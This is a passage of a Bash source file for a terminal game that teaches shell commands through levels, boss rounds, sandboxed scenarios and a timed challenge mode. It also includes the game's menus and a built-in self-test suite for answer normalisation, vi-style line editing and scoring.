  local boss="${BOSS_NAMES[$lv]}"
  if ((boss_total > 0 && boss_correct >= _boss_thresh)); then
    ((boss_correct == boss_total)) && _disk_check flawless
    printf '%s\n' "${G}${B}══ ${M}${B}${boss}${G} DEFEATED ══${N}"
    printf '%s\n' "${G}${boss_correct}/${boss_total}${N} correct!"
    printf '%s\n\n' "${W}You acquired: ${G}${LEVEL_NAMES[$lv]}${N}"
    if ((BOSS_BEATEN < lv)); then
      BOSS_BEATEN=$lv; _save_profile
      # Notify about newly unlocked scenarios
      local _si
      for ((_si=1; _si<=SC_TOTAL; _si++)); do
        ((SC_UNLOCK[_si] == lv)) && printf '%s\n' "${G}★ Scenario unlocked: ${SC_NAMES[$_si]}${N}"
      done
    fi
    printf '%s' "$_SN"
    if ((lv<MAX_LEVEL)); then
      printf "${D}Press Enter for Level %d...${N}\n" "$((lv+1))"; read -r
      LVL=$((lv+1)); QI=0; save; _sflush_if_dirty; _NEXT_LV=$LVL _NEXT_BOSS=0; return 0
    else
      _victory
      _sflush_if_dirty; return 1
    fi
  else
    printf '%s\n' "${R}${B}══ ${M}${B}${boss}${R} PREVAILS ══${N}"
    printf '%s\n\n' "${R}${boss_correct}/${boss_total}${N} - need $_boss_thresh to pass"
    printf '%s\n' "${D}r = retry boss, p = practice level${N}"
    printf '%s' "$_SN"
    read -rsn1 choice
    case "$choice" in
      p|P) QI=0; save; _sflush_if_dirty; _NEXT_LV=$lv _NEXT_BOSS=0; return 0 ;;
      *) save; _sflush_if_dirty; _NEXT_LV=$lv _NEXT_BOSS=1; return 0 ;;
    esac
  fi
}

_run_loop() {
  _session_init
  _QUIT=0; _NEXT_BOSS=0
  while run "$LVL" "$_NEXT_BOSS"; do ((_QUIT)) && break; LVL=$_NEXT_LV; done
}

_post_root_check() {
  if ((BOSS_BEATEN < MAX_LEVEL)); then
    printf '%s\n' "${R}Locked${N} — beat all 30 bosses to unlock this mode."
    exit 1
  fi
}

# ═══ POST-ROOT MODES ═══
_pick_q() {
  if [[ -z "${_LEVEL_CACHE_N[$1]:-}" ]]; then
    local _pqtmp=() _i; gen_level$1 _pqtmp
    _LEVEL_CACHE_N[$1]=${#_pqtmp[@]}
    for ((_i=0; _i<${#_pqtmp[@]}; _i++)); do _LEVEL_ITEMS[$1:$_i]="${_pqtmp[$_i]}"; done
    local IFS=$'\n'; _LEVEL_CACHE[$1]="${_pqtmp[*]}"
  fi
  local _n=${_LEVEL_CACHE_N[$1]}; ((_n)) || return 1
  local _idx=$((RANDOM % _n))
  if ((_n > 1)) && [[ "${_LAST_PICK[$1]:-}" == "$_idx" ]]; then
    _idx=$(( (_idx + 1) % _n ))
  fi
  _LAST_PICK[$1]=$_idx
  _qparse "${_LEVEL_ITEMS[$1:$_idx]}"
}

challenge() {
  _post_root_check
  _session_init
  printf '%s\e[2J\e[H%s\n%s\n' "$_SY" "${M}${B}═══ CHALLENGE ═══${N}" "${D}All levels. 20s. No manpages. One miss and you're done.${N}"
  ((BEST_CHALLENGE > 0)) && printf '%s\n' "${D}Best: ${Y}${BEST_CHALLENGE}${N}"
  printf '%s\n' "$_SN"; read -rsp "${D}Press Enter to start...${N}"; echo

  local score=0
  _mode_init g

  while true; do
    local pick_lv=$((RANDOM % MAX_LEVEL + 1))
    _pick_q "$pick_lv" || continue; local prompt=$_qprompt ans=$_qans

    _REDRAW_HDR() {
      local _t=20
      if ((${_rl_deadline:-0})); then _rl_rem; _t=$REPLY; fi
      printf '%s\e[H%s  %s  %s\e[K\n\e[K\n%s\e[K\n\e[K\n\e[J%s' "$_SY" "${M}${B}CHALLENGE${N}" "${U}Score: ${score}${N}" "${W}${_t}s${N}" "${C}${prompt}${N}" "$_SN"
    }
    printf '\e[2J'; _REDRAW_HDR

    _preq_reset
    local _ok=0
    if _read_line 0 0 20; then
      ((_QUIT)) && break
      if check "$input" "$_qanswers"; then
        _sc; ((++score)); _ok=1
        printf '%s\n' "${G}${B}+${N}"
        _pause; continue
      fi
    else
      ((_QUIT)) && break
    fi
    if ! ((_ok)); then
      _sw; printf '\n%s  %s %s\n' "${R}${B}✗${N}" "${D}expected:${N}" "${Y}${ans}${N}"; _pause; break
    fi
  done

  _sflush_if_dirty
  if ((_QUIT)); then return; fi
  printf '%s\e[2J\e[H' "$_SY"
  printf '%s\n\n' "${R}${B}═══ GAME OVER ═══${N}"
  printf 'Score: %s\n' "${B}${score}${N}"
  if ((score > BEST_CHALLENGE)); then
    printf '%s\n' "${G}${B}NEW BEST!${N} (was ${BEST_CHALLENGE})"
    BEST_CHALLENGE=$score; _save_profile
  else
    printf '%s\n' "${D}Best: ${BEST_CHALLENGE}${N}"
  fi
  printf '%s' "$_SN"
  echo
}


# ═══ MENU ═══
# Generic j/k selector. Args: title item1 item2 ...
# Items prefixed with $'\x01' are disabled (dimmed, skipped).
# Sets REPLY to selected index (0-based). Returns 1 on quit.
_sel() {
  local title=$1; shift; local -a it=("$@") n=$# c=${_SEL_CUR:-0} k; _SEL_CUR=0
  if ((c>=n)) || [[ "${it[$c]:0:1}" == $'\x01' ]]; then c=0; while ((c<n)) && [[ "${it[$c]:0:1}" == $'\x01' ]]; do ((c++)); done; fi
  ((c>=n)) && return 1
  local _draw=1 _first=1
  while true; do
    if ((_draw)); then
      local _clr=""; ((_first)) && { _clr=$'\e[2J'; _first=0; }
      local _buf; printf -v _buf '%s%s\e[H%s\e[K\n\e[K\n' "$_SY" "$_clr" "$title"
      local i; for ((i=0;i<n;i++)); do
        if [[ "${it[$i]:0:1}" == $'\x01' ]]; then printf -v _buf '%s    %s%s%s\e[K\n' "$_buf" "$D" "${it[$i]:1}" "$N"
        elif ((i==c)); then printf -v _buf '%s  %s  %s  ▸%s\e[K\n' "$_buf" "$R" "${it[$i]}" "$N"
        else printf -v _buf '%s    %s%s%s\e[K\n' "$_buf" "$W" "${it[$i]}" "$N"; fi
      done
      printf '%s\e[J%s' "$_buf" "$_SN"
      _draw=0
    fi
    read -rsn1 k
    if [[ "$k" == $'\e' ]]; then
      read -rsn2 -t 0.1 k
      if [[ -z "$k" ]]; then ((_SEL_BACK)) && return 1; continue; fi
      ((${#k} < 2)) && continue
      k="${k:1}"
    fi
    # hotkey: match (k) prefix in items
    local _hi; for ((_hi=0;_hi<n;_hi++)); do
      [[ "${it[$_hi]:0:1}" == $'\x01' ]] && continue
      [[ "${it[$_hi]}" == "(${k})"* || "${it[$_hi]}" == "${k} "* ]] && { REPLY=$_hi; return 0; }
    done
    local _oc=$c
    case "$k" in
      j|B) local _p=$((c+1)); while ((_p<n)) && [[ "${it[$_p]:0:1}" == $'\x01' ]]; do ((_p++)); done; ((_p<n)) && c=$_p;;
      k|A) local _p=$((c-1)); while ((_p>=0)) && [[ "${it[$_p]:0:1}" == $'\x01' ]]; do ((_p--)); done; ((_p>=0)) && c=$_p;;
      ''|l|C) REPLY=$c; return 0;;
      $'\x04') return 1;;
      h|D) ((_SEL_BACK)) && return 1;;
      *) continue;;
    esac
    ((c == _oc)) && continue
    _draw=1
  done
}


_sc_sel() {
  local -a it=()
  for ((i=1;i<=SC_TOTAL;i++)); do
    local req=${SC_UNLOCK[$i]:-$MAX_LEVEL}
    if ((BOSS_BEATEN<req)); then it+=($'\x01'"${SC_NAMES[$i]} (beat L${req})")
    elif _sc_is_done "$i"; then it+=("${G}✓${N} ${SC_NAMES[$i]}")
    else it+=("${SC_NAMES[$i]}"); fi
  done
  _SEL_BACK=1; _sel "${M}${B}═══ SCENARIOS ═══${N}" "${it[@]}" || return
  scenario "$((REPLY+1))"
}


_opt_tag() { ((${!1})) && REPLY="${G}on${N}" || REPLY="${R}off${N}"; }
_options_menu() {
  local _c=0
  while true; do
    local -a it=()
    _opt_tag OPT_VI;    it+=("Vi Mode          $REPLY")
    _opt_tag OPT_SOUND;  it+=("Sound            $REPLY")
    _opt_tag OPT_ALTS;   it+=("Show Alternates  $REPLY")
    _SEL_BACK=1; _SEL_CUR=$_c; _sel "${U}═══ OPTIONS ═══${N}" "${it[@]}" || break
    _c=$REPLY
    case "$REPLY" in
      0) ((OPT_VI=!OPT_VI)); _apply_opts;;
      1) ((OPT_SOUND=!OPT_SOUND));;
      2) ((OPT_ALTS=!OPT_ALTS));;
    esac
    _save_profile
  done
}

_main_menu() {
  while true; do
    local -a it=() act=()
    load
    # build tagline — center under 71-char banner
    local _tl_text _tl_w _tl_pad _tagline
    if ((BOSS_BEATEN >= MAX_LEVEL)); then _tl_text="${G}░▒▓█${N} ${W}${B}ALL BOSSES DEFEATED${N} ${G}█▓▒░${N}" _tl_w=29
    elif ((BOSS_BEATEN >= 20)); then _tl_text="${Y}░▒▓█${N} ${W}ALMOST THERE${N} ${Y}█▓▒░${N}" _tl_w=22
    elif ((BOSS_BEATEN >= 10)); then _tl_text="${D}░▒▓█${N} ${W}KEEP CLIMBING${N} ${D}█▓▒░${N}" _tl_w=23
    else _tl_text="${D}░▒▓█ MASTER THE COMMAND LINE █▓▒░${N}" _tl_w=33; fi
    printf -v _tl_pad '%*s' $(( (71 - _tl_w) / 2 )) ''
    _tagline="${_tl_pad}${_tl_text}"
    local _n=1
    if [[ -n "$PLAYER_NAME" ]] && ((LVL>1||QI>0)); then
      it+=("$((_n++)) Continue  ${D}Level $LVL Q$((QI+1))${N}"); act+=(cont)
    fi
    it+=("$((_n++)) New Game"); act+=(new)
    local _any=0; for ((i=1;i<=SC_TOTAL;i++)); do ((BOSS_BEATEN>=${SC_UNLOCK[$i]:-$MAX_LEVEL})) && _any=1; done
    if ((_any)); then it+=("$((_n++)) Scenarios"); act+=(sc)
    else it+=($'\x01'"$((_n++)) Scenarios"); act+=(x); fi
    if ((BOSS_BEATEN>=MAX_LEVEL)); then
      it+=("$((_n++)) Challenge"); act+=(challenge)
    else
      it+=($'\x01'"$((_n++)) Challenge"); act+=(x)
    fi
    if [[ -n "$PLAYER_NAME" ]]; then it+=("$((_n++)) Stats"); act+=(stats)
    else it+=($'\x01'"$((_n++)) Stats"); act+=(x); fi
    it+=("$((_n++)) Options"); act+=(opts)
    it+=("$((_n++)) Quit"); act+=(quit)
    local _banner
    printf -v _banner '%s\n%s\n%s\n%s\n%s\n%s\n\n%s' \
      "   ${W}${B}██████╗███╗   ███╗██████╗  ██████╗██╗  ██╗ █████╗ ███╗   ███╗██████╗${N}" \
      "  ${W}${B}██╔════╝████╗ ████║██╔══██╗██╔════╝██║  ██║██╔══██╗████╗ ████║██╔══██╗${N}" \
      "  ${W}${B}██║     ██╔████╔██║██║  ██║██║     ███████║███████║██╔████╔██║██████╔╝${N}" \
      "  ${W}${B}██║     ██║╚██╔╝██║██║  ██║██║     ██╔══██║██╔══██║██║╚██╔╝██║██╔═══╝${N}" \
      "  ${W}${B}╚██████╗██║ ╚═╝ ██║██████╔╝╚██████╗██║  ██║██║  ██║██║ ╚═╝ ██║██║${N}" \
      "   ${W}${B}╚═════╝╚═╝     ╚═╝╚═════╝  ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝╚═╝${N}" \
      "${_tagline}"
    _SEL_BACK=0; _sel "$_banner" "${it[@]}" || { _CLEANING=1; exit 0; }
    _SEL_CUR=$REPLY
    _QUIT=0
    case "${act[$REPLY]}" in
      cont) _run_loop;;
      new) if [[ -n "$PLAYER_NAME" ]] && ((LVL>1||QI>0)); then
          printf '\n'; read -rp "  ${R}Reset all progress? [y/N]${N} " yn
          [[ "$yn" =~ ^[Yy] ]] || continue
        fi
        rm -f "$DATA"/*.json "$DATA/scores" "$DATA/scores.lock" "$DATA/profile"; rm -rf "$DATA/sandbox" "$DATA/sandbox.pristine" 2>/dev/null
        PLAYER_NAME="" BOSS_BEATEN=0; _load_profile; load
        _first_run; _run_loop;;
      sc) _sc_sel;;
      challenge) challenge;;
      opts) _options_menu;;
      quit) _CLEANING=1; exit 0;;
      stats) printf '%s\e[2J\e[H' "$_SY"; stats; printf '%s' "$_SN"; local _sk; while read -rsn1 _sk; do
        [[ "$_sk" == h || "$_sk" == q || -z "$_sk" ]] && break
        [[ "$_sk" == $'\e' ]] && { read -rsn2 -t 0.1 _sk; [[ "${_sk:1}" == D ]] && break; [[ -z "$_sk" ]] && break; }
        done;;
    esac
  done
}

# ═══ SCENARIO ENGINE ═══

_perms_restore() { while IFS=' ' read -r _pmode _ppath; do [[ -n "$_ppath" ]] && chmod "$_pmode" "$_ppath" 2>/dev/null; done < "$2"; }
# Uses dynamic-scoped _sc_snap, _perms_file from scenario()
_sc_snap_save() {
  find "$SANDBOX_DIR" -printf '%m %p\n' > "$_perms_file" 2>/dev/null
  chmod -R u+rwX "$SANDBOX_DIR" 2>/dev/null
  local _t; _t=$(mktemp -d "${_sc_snap}.XXXXXX") || return
  rm -rf "$_t"
  cp -a "$SANDBOX_DIR" "$_t" && { rm -rf "$_sc_snap"; mv "$_t" "$_sc_snap"; } || rm -rf "$_t"
  _perms_restore "$SANDBOX_DIR" "$_perms_file"
}
_sc_snap_restore() {
  chmod -R u+rwX "$SANDBOX_DIR" 2>/dev/null
  local _t; _t=$(mktemp -d "${SANDBOX_DIR}.XXXXXX") || return
  rm -rf "$_t"
  cp -a "$_sc_snap" "$_t" && { rm -rf "$SANDBOX_DIR"; mv "$_t" "$SANDBOX_DIR"; } || rm -rf "$_t"
  _perms_restore "$SANDBOX_DIR" "$_perms_file"
}
scenario() {
  local sc_id=${1:-0}
  ((sc_id == 0)) && { _sc_sel; return; }
  ((sc_id < 1 || sc_id > SC_TOTAL)) && { printf '%s\n' "${R}Scenario ${sc_id} does not exist.${N}"; return 1; }
  local _sc_req=${SC_UNLOCK[$sc_id]:-$MAX_LEVEL}
  if ((BOSS_BEATEN < _sc_req)); then
    printf '%s\n' "${R}Locked${N} — beat the ${U}Level ${_sc_req}${N} boss (${M}${B}${LEVEL_NAMES[$_sc_req]}${N}) first."
    return 1
  fi
  if ! ((SANDBOX_MODE)); then
    printf '%s\n' "${R}Scenarios require sandbox mode.${N}"; return 1
  fi
  _session_init
  _mode_init "sc${sc_id}"

  # Fresh sandbox + apply broken state
  _sandbox_reset
  "_sc_setup_${sc_id}" "$SANDBOX_DIR"

  # Load steps
  local -a steps=()
  while IFS= read -r line; do [[ -n "$line" ]] && steps+=("$line"); done <<< "$("_sc_steps_${sc_id}")"
  local total=${#steps[@]} correct=0

  # Splash screen
  printf '%s\e[2J\e[H' "$_SY"
  printf '%s\n' "${M}${B}═══ ${SC_NAMES[$sc_id]} ═══${N}"
  printf '%s\n' "${D}${SC_FLAVOR[$sc_id]}${N}"
  printf '%s\n\n' "${U}${total} steps${N} ${D}— sandbox state persists between steps${N}"
  printf '%s' "$_SN"
  read -rsp "${D}Press Enter to start...${N}"; echo

  local si _sc_snap="$DATA/sandbox.snap"
  for ((si=0; si<total; si++)); do
    _qparse "${steps[$si]}"
    local prompt=$_qprompt ans=$_qans

    local _perms_file="$_sc_snap.perms"
    _sc_snap_save

    _REDRAW_HDR() {
      printf '%s\e[H%s  %s\e[K\n\e[K\n%s\e[K\n\e[K\n\e[J%s' "$_SY" "${M}${B}${SC_NAMES[$sc_id]}${N}" "${U}[Step $((si+1))/${total}]${N}" "${C}${prompt}${N}" "$_SN"
    }
    printf '\e[2J'; _REDRAW_HDR
    HIST=()

    while true; do
      _read_line 1 1
      ((_QUIT)) && break
      [[ -z "$input" ]] && { draw; continue; }
      if check "$input" "$_qanswers"; then
        _sc; _disk_check streak; ((++correct))
        printf '\n%s\n' "${G}${B}+${N}"
        _pause
        break
      elif ((_SANDBOX_REQUIRE_FAIL == 2)); then
        printf '\n%s\n' "${Y}right command — use the exact string from the question${N}"
        sleep 1; printf '\e[2J'; _REDRAW_HDR; continue
      else
        [[ -n "$input" ]] && { HIST+=("$input"); HIST_IDX=${#HIST[@]}; HIST_SAVE=""; }
        ((_S_ANSWERED++)); _S_STREAK=0; _wrong_show; _disk_check wrong "$input"
        explain "$ans"
        _sc_snap_restore
        _pause retry
        printf '\e[2J'; _REDRAW_HDR
      fi
    done
    ((_QUIT)) && break
  done
  rm -rf "$_sc_snap" "$_sc_snap.perms" 2>/dev/null
  if ((_QUIT)); then _sflush_if_dirty; return; fi
  # Completion
  printf '%s\e[2J\e[H' "$_SY"
  printf '%s\n' "${G}${B}═══ SCENARIO COMPLETE ═══${N}"
  printf '%s\n' "${M}${B}${SC_NAMES[$sc_id]}${N}"
  printf '%s\n' "${G}${correct}/${total}${N} steps"
  printf '%s' "$_SN"
  _sc_mark_done "$sc_id"
  _disk_check completionist
  _sflush_if_dirty
  echo
}

# ═══ SELFTEST ═══
_selftest() {
  local _pass=0 _fail=0 _t
  _assert() {
    local desc=$1 got=$2 want=$3
    if [[ "$got" == "$want" ]]; then ((_pass++))
    else ((_fail++)); printf '  FAIL: %s\n    got:  %s\n    want: %s\n' "$desc" "$got" "$want"; fi
  }
  _assert_match() {
    local desc=$1 got=$2 pat=$3
    if [[ "$got" =~ $pat ]]; then ((_pass++))
    else ((_fail++)); printf '  FAIL: %s\n    got:  %s\n    want: ~%s\n' "$desc" "$got" "$pat"; fi
  }

  printf '%s\n' "${B}=== _fnorm ===${N}"
  local -a _ft=(
    $'identity\tls\tls'
    $'trim\t  ls -l  \tls -l'
    $'flag sort\tls -l -a\tls -a -l'
    $'combined split\tls -la\tls -a -l'
    $'single quotes\tgrep \'foo\' bar\tgrep foo bar'
    $'double quotes\tgrep "foo" bar\tgrep foo bar'
    $'flag quote strip\tawk -F\',\'\tawk -F ,'
    $'redirect split\techo hi >out\techo hi > out'
    $'stderr redirect\tcmd 2>/dev/null\tcmd 2> /dev/null'
    $'pipe\tcat f | grep x\tcat f | grep x'
    $'pipe no space\tcat f|grep x\tcat f | grep x'
    $'dotslash\tls ./foo\tls foo'
    $'head -N\thead -5 file\thead -n 5 file'
    $'tail -N\ttail -20 log\ttail -n 20 log'
    $'head --lines\thead --lines file\thead -n file'
    $'long=val\tsort --field-separator=,\tsort --field-separator ,'
    $'-n5 split\thead -n5 f\thead -n 5 f'
    $'-t, split\tsort -t, file\tsort -t , file'
    $'-F: split\tawk -F: prog file\tawk -F : prog file'
    $'-d/ split\tcut -d/ -f1\tcut -d -f / 1'
    $'dashdash\tgrep -- -v file\tgrep -- -v file'
    $'semicolon\tcmd1; cmd2\tcmd1 ; cmd2'
    $'semicolon glued\tcmd1;cmd2\tcmd1 ; cmd2'
    $'empty\t\t'
    $'double pipe\tcmd1 || cmd2\tcmd1 || cmd2'
    $'complex\tgrep -rn \'TODO\' ./src\tgrep -n -r TODO src'
    $'awk -F:\tawk -F: \'{print $1}\' /etc/passwd\tawk -F : \'{print $1}\' /etc/passwd'
    $'append redirect\techo hi >>out\techo hi >> out'
    $'multi args\tcp a b c\tcp a b c'
    $'tail +N\ttail -n +5 file\ttail -n +5 file'
    $'tar bundle sort\ttar xzf a.tar.gz\ttar fxz a.tar.gz'
    $'tar bundle sort2\ttar czf a.tar.gz dir\ttar cfz a.tar.gz dir'
  )
  for _t in "${_ft[@]}"; do IFS=$'\t' read -r _d _i _w <<< "$_t"; _fnorm "$_i"; _assert "$_d" "$REPLY" "$_w"; done

  printf '%s\n' "${B}=== _hash ===${N}"
  _hash "test123"; local h1=$REPLY
  _hash "test123"; _assert "deterministic" "$REPLY" "$h1"
  _assert_match "hex format" "$h1" '^[0-9a-f]{8}$'
  _hash "test124"; [[ "$REPLY" != "$h1" ]]; _assert "different input" "$?" "0"
  _assert "cached" "${_HASH_CACHE[test123]}" "$h1"

  printf '%s\n' "${B}=== norm ===${N}"
  local -a _ta=(c a b d)
  norm _ta; _assert "sort" "${_ta[*]}" "a b c d"
  local -a _tb=(z)
  norm _tb; _assert "single" "${_tb[*]}" "z"
  local -a _tc=()
  norm _tc; _assert "empty" "${_tc[*]}" ""
  local -a _td=(b a c a)
  norm _td; _assert "dupes" "${_td[*]}" "a a b c"

  printf '%s\n' "${B}=== check (text match) ===${N}"
  local _save_sandbox=$SANDBOX_MODE; SANDBOX_MODE=0
  _qdelim='|' _qtext=0 _qoutput="" _qstate=""
  check "pwd" "pwd" && _t=0 || _t=$?; _assert "exact" "$_t" "0"
  check "ls -la" "ls -la|ls -al" && _t=0 || _t=$?; _assert "multi answer" "$_t" "0"
  check "  pwd  " "pwd" && _t=0 || _t=$?; _assert "trim input" "$_t" "0"
  check "ls -al" "ls -la" && _t=0 || _t=$?; _assert "normalized" "$_t" "0"
  check "wrong" "pwd" && _t=0 || _t=$?; _assert "wrong answer" "$_t" "1"
  check "ls /tmp/foo" '~^ls /tmp/' && _t=0 || _t=$?; _assert "regex match" "$_t" "0"
  check "cat /etc" '~^ls /tmp/' && _t=0 || _t=$?; _assert "regex no match" "$_t" "1"
  _qdelim='§'
  check "grep foo bar" 'grep foo bar§cat bar | grep foo' && _t=0 || _t=$?; _assert "§ delim" "$_t" "0"
  _qdelim='|'
  SANDBOX_MODE=$_save_sandbox

  printf '%s\n' "${B}=== _qparse ===${N}"
  _qparse "Print current directory|pwd|#output:~^/"
  _assert "qparse prompt" "$_qprompt" "Print current directory"
  _assert "qparse ans" "$_qans" "pwd"
  _assert "qparse output" "$_qoutput" "~^/"
  _assert "qparse delim" "$_qdelim" "|"
  _assert "qparse text" "$_qtext" "0"
  _qparse "Search for foo§grep foo bar§cat bar | grep foo§#output:foo#state:exists:bar"
  _assert "qparse § prompt" "$_qprompt" "Search for foo"
  _assert "qparse § ans" "$_qans" "grep foo bar"
  _assert "qparse § delim" "$_qdelim" "§"
  _assert "qparse § output" "$_qoutput" "foo"
  _assert "qparse § state" "$_qstate" "exists:bar"
  _qparse "View file|less file|#text:"
  _assert "qparse text flag" "$_qtext" "1"
  _assert "qparse text no output" "$_qoutput" ""
  _qparse "Cut field§cut -d: -f1 <<< 'a:b'§#require:a:b:c#output:~^a$"
  _assert "qparse require" "$_qrequire" "a:b:c"
  _assert "qparse require output" "$_qoutput" "~^a$"
  _assert "qparse require prompt" "$_qprompt" "Cut field"

  printf '%s\n' "${B}=== vi handler ===${N}"
  # Test harness: set up shared vars, call _vi_normal with c=KEY, check result
  local _save_draw; _save_draw=$(declare -f draw)
  local _save_vi_read; _save_vi_read=$(declare -f _vi_read)
  draw() { :; }  # no-op during tests
  _REDRAW_HDR() { :; }
  _quit() { :; }
  local _rl_hints=0 _rl_hist=0 _man_open=0 mode=normal _rep=""
  local UNDO_STACK=() HIST=() HIST_IDX=0 HIST_SAVE=""

  # Feed buffer for compound keys (d,c,r,f,F,t,T,g)
  local _vi_feed=""
  _vi_read() { c2="${_vi_feed:0:1}"; _vi_feed="${_vi_feed:1}"; }

  # _vi_assert: set input/cursor, feed key(s), check result
  # $7 (optional): expected mode (default "normal")
  _vi_assert() {
    local desc=$1 init_input=$2 init_cursor=$3 keys=$4 want_input=$5 want_cursor=$6
    local want_mode="${7:-normal}"
    input="$init_input" cursor=$init_cursor _rep="" mode="normal" UNDO_STACK=() _vi_feed=""
    local _k _ch
    for ((_k=0; _k<${#keys}; _k++)); do
      _ch="${keys:_k:1}"
      # For compound keys, next char goes to feed buffer
      case "$_ch" in d|c|r|f|F|t|T|g) ((_k++)); _vi_feed="${keys:_k:1}"; esac
      c="$_ch"; _vi_normal || true
    done
    local _ok=1
    [[ "$input" != "$want_input" ]] && _ok=0
    ((cursor != want_cursor)) && _ok=0
    [[ "$mode" != "$want_mode" ]] && _ok=0
    if ((_ok)); then ((_pass++))
    else ((_fail++)); printf '  FAIL: %s\n    input: "%s" (want "%s")  cursor: %d (want %d)  mode: %s (want %s)\n' \
      "$desc" "$input" "$want_input" "$cursor" "$want_cursor" "$mode" "$want_mode"; fi
  }

  _vi_assert "h moves left"       "hello" 3 "h"   "hello" 2
  _vi_assert "l moves right"      "hello" 1 "l"   "hello" 2
  _vi_assert "0 goes to start"    "hello" 3 "0"   "hello" 0
  _vi_assert '$ goes to end'      "hello" 0 '$'   "hello" 4
  _vi_assert "h at 0 stays"       "abc"   0 "h"   "abc"   0
  _vi_assert "l at end stays"     "abc"   2 "l"   "abc"   2
  _vi_assert "3h moves 3 left"   "abcde" 4 "3h"  "abcde" 1
  _vi_assert "2l moves 2 right"  "abcde" 0 "2l"  "abcde" 2
  _vi_assert "w next word"       "foo bar baz" 0 "w"   "foo bar baz" 4
  _vi_assert "b prev word"       "foo bar baz" 4 "b"   "foo bar baz" 0
  _vi_assert "e end of word"     "foo bar" 0 "e"  "foo bar" 2
  _vi_assert "2w two words"      "aa bb cc dd" 0 "2w"  "aa bb cc dd" 6
  _vi_assert "2b two words back" "aa bb cc dd" 6 "2b"  "aa bb cc dd" 0
  _vi_assert "fa finds a"        "hello world" 0 "fa"  "hello world" 0
  _vi_assert "fo finds o"        "hello world" 0 "fo"  "hello world" 4
  _vi_assert "Fo finds o back"   "hello world" 6 "Fo"  "hello world" 4
  _vi_assert "to till o"         "hello world" 0 "to"  "hello world" 3
  _vi_assert "To till o back"    "hello world" 6 "To"  "hello world" 5
  _vi_assert "2fo second o"      "foo boo coo" 0 "2fo" "foo boo coo" 2
  _vi_assert "fx no match"       "hello" 0 "fz"  "hello" 0
  _vi_assert "x deletes char"     "hello" 1 "x"   "hllo"  1
  _vi_assert "X deletes before"   "hello" 2 "X"   "hllo"  1
  _vi_assert "2x deletes 2"      "abcde" 1 "2x"  "ade"   1
  _vi_assert "D deletes to end"   "hello" 2 "D"   "he"    1
  _vi_assert "S clears line"      "hello" 2 "S"   ""      0  "insert"
  _vi_assert "dw del word"       "foo bar" 0 "dw"  "bar"   0
  _vi_assert "db del word back"  "foo bar" 4 "db"  "bar"   0
  _vi_assert "dd del line"       "hello" 2 "dd"   ""      0
  _vi_assert 'd$ del to end'     "hello" 2 'd$'   "he"    1
  _vi_assert "d0 del to start"   "hello" 2 "d0"   "llo"   0
  _vi_assert "cw change word"    "foo bar" 0 "cw"  "bar"   0  "insert"
  _vi_assert "cc change line"    "hello" 2 "cc"   ""      0  "insert"
  _vi_assert "C change to end"   "hello" 2 "C"    "he"    2  "insert"
  _vi_assert "rx replace char"   "hello" 1 "rx"   "hxllo" 1
  _vi_assert "u undo x"         "hello" 1 "xu"   "hello" 1
  _vi_assert "u undo dw"        "foo bar" 0 "dwu" "foo bar" 0
  _vi_assert "gg goto start"    "hello" 3 "gg"   "hello" 0
  _vi_assert "G goto end"       "hello" 1 "G"    "hello" 4
  _vi_assert "i enters insert"   "abc" 1 "i"   "abc" 1  "insert"
  _vi_assert "a enters insert"   "abc" 1 "a"   "abc" 2  "insert"
  _vi_assert "A enters insert"   "abc" 1 "A"   "abc" 3  "insert"
  _vi_assert "I enters insert"   "abc" 1 "I"   "abc" 0  "insert"
  _vi_assert "s subst+insert"    "abc" 1 "s"   "ac"  1  "insert"

  eval "$_save_draw"
  eval "$_save_vi_read"

  printf '%s\n' "${B}=== _sandbox_check_output ===${N}"
  _assert "line count 2 lines"    "$(_sandbox_check_output $'foo\nbar\n' '@2' && echo y || echo n)" "y"
  _assert "line count 1 line"     "$(_sandbox_check_output 'foo' '@1' && echo y || echo n)" "y"
  _assert "line count trailing nl" "$(_sandbox_check_output $'foo\nbar\n' '@2' && echo y || echo n)" "y"
  _assert "line count wrong"      "$(_sandbox_check_output $'foo\nbar\n' '@3' && echo y || echo n)" "n"
  _assert "line count empty"      "$(_sandbox_check_output '' '@1' && echo y || echo n)" "n"
  _assert "regex hit"            "$(_sandbox_check_output 'hello world' '~hello' && echo y || echo n)" "y"
  _assert "regex miss"           "$(_sandbox_check_output 'hello world' '~^goodbye' && echo y || echo n)" "n"
  _assert "any output yes"       "$(_sandbox_check_output 'stuff' '*' && echo y || echo n)" "y"
  _assert "any output no"        "$(_sandbox_check_output '' '*' && echo y || echo n)" "n"
  _assert "exact match trimmed"  "$(_sandbox_check_output '  foo  ' 'foo' && echo y || echo n)" "y"
  _assert "exact match miss"     "$(_sandbox_check_output 'bar' 'foo' && echo y || echo n)" "n"
  _assert "no expected fails"    "$(_sandbox_check_output 'x' '' && echo y || echo n)" "n"

  printf '%s\n' "${B}=== scoring ===${N}"
  local _test_data; _test_data=$(mktemp -d)
  local _save_data="$DATA"; DATA="$_test_data"
  touch "$DATA/scores"
  declare -A _sc=()
  _MODE_TAG="1"
  _sdirty=0
  _sget() { _hash "$1"; local _v="${_sc[$REPLY]:-1}"; REPLY="${_v%%|*}"; }
  _sset "test question 1" 2
  _sget "test question 1"; _assert "sget after sset" "$REPLY" "2"
  _sset "test question 1" 3
  _sget "test question 1"; _assert "sget overwrite" "$REPLY" "3"
  _sget "never seen"; _assert "sget default" "$REPLY" "1"
  _sflush
  _assert "scores file exists" "$([[ -f "$DATA/scores" ]] && echo y || echo n)" "y"
  local _sc_content; _sc_content=$(<"$DATA/scores")
  _assert "scores has data" "$([[ -n "$_sc_content" ]] && echo y || echo n)" "y"
  DATA="$_save_data"
  rm -rf "$_test_data"

  printf '%s\n' "${B}=== decay ===${N}"
  _test_data=$(mktemp -d)
  _save_data="$DATA"; DATA="$_test_data"
  touch "$DATA/scores"
  declare -A _sc=()
  _MODE_TAG="1"
  _sdirty=0
  local _now; printf -v _now '%(%s)T' -1
  _hash "decay test q1"
  _sc[$REPLY]="2|1|$((_now - 3456000))"  # 40d ago, tier 2
  _hash "decay test q2"
  _sc[$REPLY]="1|1|$((_now - 1300000))"  # ~15d ago, tier 1
  _sflush
  LAST_DECAY=0
  _save_profile() { :; }  # no-op
  local _dk _dv _dt
  for _dk in "${!_sc[@]}"; do
    _dv="${_sc[$_dk]}"; _dt="${_dv%%|*}"
    local _deps="${_dv##*|}"
    [[ "$_deps" =~ ^[0-9]{10,}$ ]] || continue
    local _age=$((_now - _deps))
    if ((_dt >= 2 && _age > _DECAY_T2)); then
